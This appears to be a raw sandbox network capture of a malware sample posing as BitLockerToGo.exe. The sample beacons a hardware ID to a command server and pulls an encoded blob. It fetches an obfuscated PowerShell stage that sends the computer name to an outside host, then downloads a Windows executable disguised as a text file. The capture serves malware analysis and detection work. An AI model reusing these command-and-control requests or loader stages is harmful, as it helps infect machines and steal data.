                                                                                                                  2024-12-29 07:55:57 UTC15331OUTData Raw: 2d 2d 30 38 38 34 4c 46 41 4d 50 54 5a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 45 46 36 43 46 31 30 34 42 43 39 43 38 46 45 42 33 45 43 35 46 45 44 38 41 44 36 32 41 38 0d 0a 2d 2d 30 38 38 34 4c 46 41 4d 50 54 5a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 38 38 34 4c 46 41 4d 50 54 5a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 30 38 38 34 4c 46 41 4d 50 54 5a 45 0d 0a 43
                                                                                                                  Data Ascii: --0884LFAMPTZEContent-Disposition: form-data; name="hwid"07EF6CF104BC9C8FEB3EC5FED8AD62A8--0884LFAMPTZEContent-Disposition: form-data; name="pid"3--0884LFAMPTZEContent-Disposition: form-data; name="lid"hRjzG3--ZINA--0884LFAMPTZEC
                                                                                                                  2024-12-29 07:55:57 UTC5199OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: un 4F([:7s~X`nO`i
                                                                                                                  2024-12-29 07:55:58 UTC1142INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 29 Dec 2024 07:55:57 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=7t7nasop5rhlnqgruc16glb6bl; expires=Thu, 24 Apr 2025 01:42:36 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ZbHP%2BwLfx87rFwBWvxRYGZN4vdBSN0Vc8%2Bq1R9lo0nAsahfPR2XPiEvob1LIkbPJYCqgn9t3%2BJIuZW%2F8GWoRMBxse%2Fk%2Fe0e%2Bs6RshTEllZryqW81gb%2B12rJNu8HKpLcDjqLIhK%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f983b12f958431c-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2163&min_rtt=2155&rtt_var=824&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2848&recv_bytes=21489&delivery_rate=1315908&cwnd=237&unsent_bytes=0&cid=b7e209323353b391&ts=1047&x=0"
                                                                                                                  2024-12-29 07:55:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                  2024-12-29 07:55:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.549765172.67.152.1604435284C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-29 07:55:59 UTC282OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: multipart/form-data; boundary=6I7I4SSZ7PYZO9GY
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 1227
                                                                                                                  Host: simplerapplau.click
                                                                                                                  2024-12-29 07:55:59 UTC1227OUTData Raw: 2d 2d 36 49 37 49 34 53 53 5a 37 50 59 5a 4f 39 47 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 45 46 36 43 46 31 30 34 42 43 39 43 38 46 45 42 33 45 43 35 46 45 44 38 41 44 36 32 41 38 0d 0a 2d 2d 36 49 37 49 34 53 53 5a 37 50 59 5a 4f 39 47 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 49 37 49 34 53 53 5a 37 50 59 5a 4f 39 47 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 36 49 37
                                                                                                                  Data Ascii: --6I7I4SSZ7PYZO9GYContent-Disposition: form-data; name="hwid"07EF6CF104BC9C8FEB3EC5FED8AD62A8--6I7I4SSZ7PYZO9GYContent-Disposition: form-data; name="pid"1--6I7I4SSZ7PYZO9GYContent-Disposition: form-data; name="lid"hRjzG3--ZINA--6I7
                                                                                                                  2024-12-29 07:56:02 UTC1131INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 29 Dec 2024 07:56:02 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=ofuai6qlr4a6mh4imrn19tl33i; expires=Thu, 24 Apr 2025 01:42:39 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x3qjFUt01NJlnps9tTgRLPLDOuxfazF8HBtjVQFkJRPpNy1grMUCL6LPNMIS%2BDZYX3SkiKVQ0pym%2Bua0bJQIev%2FHutJQKEVHWETGI1jnCJipyhMHI1H3mpxBez%2BTW9%2Fun7j2kRlT"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f983b249df27cf3-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1996&rtt_var=754&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2145&delivery_rate=1444829&cwnd=218&unsent_bytes=0&cid=d8954f584a384f24&ts=3040&x=0"
                                                                                                                  2024-12-29 07:56:02 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                  2024-12-29 07:56:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.549776172.67.152.1604435284C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-29 07:56:04 UTC281OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: multipart/form-data; boundary=ZR4JU6HBP6VSK8S
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 1113
                                                                                                                  Host: simplerapplau.click
                                                                                                                  2024-12-29 07:56:04 UTC1113OUTData Raw: 2d 2d 5a 52 34 4a 55 36 48 42 50 36 56 53 4b 38 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 45 46 36 43 46 31 30 34 42 43 39 43 38 46 45 42 33 45 43 35 46 45 44 38 41 44 36 32 41 38 0d 0a 2d 2d 5a 52 34 4a 55 36 48 42 50 36 56 53 4b 38 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 52 34 4a 55 36 48 42 50 36 56 53 4b 38 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 5a 52 34 4a 55 36
                                                                                                                  Data Ascii: --ZR4JU6HBP6VSK8SContent-Disposition: form-data; name="hwid"07EF6CF104BC9C8FEB3EC5FED8AD62A8--ZR4JU6HBP6VSK8SContent-Disposition: form-data; name="pid"1--ZR4JU6HBP6VSK8SContent-Disposition: form-data; name="lid"hRjzG3--ZINA--ZR4JU6
                                                                                                                  2024-12-29 07:56:05 UTC1130INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 29 Dec 2024 07:56:05 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=vg2dc1qatb3fe6m003suuf80aq; expires=Thu, 24 Apr 2025 01:42:44 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qDBaT5gcqSdkm%2FjvwqbEZMZfgqoTUxPuY%2Ff%2BeRiDmKCxXrLIJbKnxmZ%2Foj35p9dFjrwYhFSmFnLOOSELV8iI8j3blV%2BEqXIvkLxbM671JYPEoK1TpD65g6HSUrn9mj4JuyN8cf4H"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f983b42c9c142a1-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1591&rtt_var=634&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2030&delivery_rate=1678160&cwnd=241&unsent_bytes=0&cid=0ce4ba3a9902bc76&ts=922&x=0"
                                                                                                                  2024-12-29 07:56:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                  2024-12-29 07:56:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.549782172.67.152.1604435284C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-29 07:56:06 UTC268OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 113
                                                                                                                  Host: simplerapplau.click
                                                                                                                  2024-12-29 07:56:06 UTC113OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 30 37 45 46 36 43 46 31 30 34 42 43 39 43 38 46 45 42 33 45 43 35 46 45 44 38 41 44 36 32 41 38
                                                                                                                  Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--ZINA&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=07EF6CF104BC9C8FEB3EC5FED8AD62A8
                                                                                                                  2024-12-29 07:56:07 UTC1124INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 29 Dec 2024 07:56:07 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=6innfk120kbqubftru9p3ik21j; expires=Thu, 24 Apr 2025 01:42:46 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uAj6vdS2cxWUZKvYaBcwjaQIJSihZC7BXtfFTSJDagmNE4IXyrDVw%2BztUCRyseWiYNmHzbnq28KVjwaOE1OlW3SRHArqkZjB8sxVOBn3AKlOeL0BBim7QtQwotcGK1tTS%2BlplTa4"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f983b510dda4211-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2360&min_rtt=2342&rtt_var=891&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1017&delivery_rate=1246797&cwnd=239&unsent_bytes=0&cid=c8aa9d9fc5a05339&ts=684&x=0"
                                                                                                                  2024-12-29 07:56:07 UTC218INData Raw: 64 34 0d 0a 70 48 6f 73 65 39 33 50 38 77 43 59 67 56 6a 35 62 55 42 39 32 46 42 6e 4c 78 59 4e 69 43 6c 63 48 38 64 46 69 4c 72 62 43 76 58 2f 41 51 34 4f 2f 2f 58 52 61 4f 7a 31 4b 49 70 58 48 46 4b 45 66 77 52 4b 63 58 69 6d 57 6a 52 77 74 78 6d 6e 67 75 34 39 77 5a 5a 4d 48 6b 2f 70 2b 61 38 76 36 4f 6c 32 6a 52 55 30 58 2f 52 79 41 56 73 30 4e 37 6f 46 66 6e 72 6c 66 37 6e 48 39 33 48 58 30 56 67 57 57 62 57 37 68 33 44 72 75 77 54 57 4d 57 38 57 74 44 6b 58 57 57 4e 67 34 56 6f 70 64 75 6b 32 34 4e 57 72 56 74 72 4e 46 46 67 6b 76 71 4f 44 58 2b 76 70 4f 64 63 5a 4f 41 6e 36 66 45 56 4a 59 69 2b 79 47 58 41 39 6f 6d 65 79 69 71 5a 58 0d 0a
                                                                                                                  Data Ascii: d4pHose93P8wCYgVj5bUB92FBnLxYNiClcH8dFiLrbCvX/AQ4O//XRaOz1KIpXHFKEfwRKcXimWjRwtxmngu49wZZMHk/p+a8v6Ol2jRU0X/RyAVs0N7oFfnrlf7nH93HX0VgWWbW7h3DruwTWMW8WtDkXWWNg4Vopduk24NWrVtrNFFgkvqODX+vpOdcZOAn6fEVJYi+yGXA9omeyiqZX
                                                                                                                  2024-12-29 07:56:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.549788185.161.251.214435284C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-29 07:56:09 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Host: cegu.shop
                                                                                                                  2024-12-29 07:56:10 UTC249INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.26.2
                                                                                                                  Date: Sun, 29 Dec 2024 07:56:10 GMT
                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                  Content-Length: 329
                                                                                                                  Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                  Connection: close
                                                                                                                  ETag: "676c9e2a-149"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-12-29 07:56:10 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                  Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.549796172.67.208.584435284C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-29 07:56:12 UTC206OUTGET /int_clp_sha.txt HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Host: klipvumisui.shop
                                                                                                                  2024-12-29 07:56:13 UTC907INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 29 Dec 2024 07:56:12 GMT
                                                                                                                  Content-Type: text/plain
                                                                                                                  Content-Length: 8767044
                                                                                                                  Connection: close
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  ETag: "51f99eddd33cc04fb0f55f873b76d907"
                                                                                                                  Last-Modified: Sat, 28 Dec 2024 20:49:42 GMT
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c7w3FgvDdj92e2YsfodA%2BAcWRZNig8CEOfbvmZ53M5O1UvBW%2BU0pJ2Wnyl32t0%2Bw0A9ckIYMRLqo9vCAkCgTnN8je4jkiMJPHG%2F%2BJ1qzgE4SNqYoLQYQmZzq1i9giWeH%2FmAL"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f983b733cd07cac-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2002&min_rtt=1997&rtt_var=760&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2866&recv_bytes=820&delivery_rate=1430671&cwnd=197&unsent_bytes=0&cid=2bb4d6ab1dce88a2&ts=627&x=0"
                                                                                                                  2024-12-29 07:56:13 UTC462INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                  2024-12-29 07:56:13 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 64 1b 00 00 00 70 0a 00 00 1c 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 58 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00
                                                                                                                  Data Ascii: R\`.textVX `.itextdp\ `.data88:x@.bssXr.idataP@.didata
                                                                                                                  2024-12-29 07:56:13 UTC1369INData Raw: 00 2c 13 40 00 01 07 48 52 45 53 55 4c 54 04 00 00 00 80 ff ff ff 7f 02 00 44 13 40 00 0e 05 54 47 55 49 44 10 00 00 00 00 00 00 00 00 04 00 00 00 e4 10 40 00 00 00 00 00 02 02 44 31 02 00 cc 10 40 00 04 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 06 00 0b 40 76 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 09 28 9c 4a 00 05 45 6d 70 74 79 00 00 40 13 40 00 00 02 00 09 28 9c 4a 00 06 43 72 65 61 74 65 00 00 40 13 40 00 02 02
                                                                                                                  Data Ascii: ,@HRESULTD@TGUID@D1@D2@D3D4@v@&op_Equality@@@Left@@Right(J&op_Inequality@@@Left@@Right(JEmpty@@(JCreate@@
                                                                                                                  2024-12-29 07:56:13 UTC1369INData Raw: 46 1f 40 00 4a 00 fe ff 72 1f 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 7d 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 7d 40 00 04 46 72 65 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 44 69 73 70 6f 73 65 4f 66 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 3e 00 f4 7d 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 2f 00 94 7e 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a
                                                                                                                  Data Ascii: F@Jr@MTObject&}@Create@Self$}@Free@Self)(JDisposeOf@Self>}@InitInstance@Self@Instance/~@CleanupInstance@Self)(J
                                                                                                                  2024-12-29 07:56:13 UTC1369INData Raw: 40 b8 12 40 00 01 00 01 01 02 00 02 00 5b 00 e8 80 40 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 28 13 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 08 9c 1f 40 00 01 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 00 11 40 00 02 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 31 00 08 81 40 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 0c 81 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 10 81 40 00 08 44 69 73 70 61 74 63 68 03 00 00 00 00 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65
                                                                                                                  Data Ascii: @@[@SafeCallException(@@Self@ExceptObject@ExceptAddr1@AfterConstruction@Self1@BeforeDestruction@Self9@Dispatch@SelfMessage
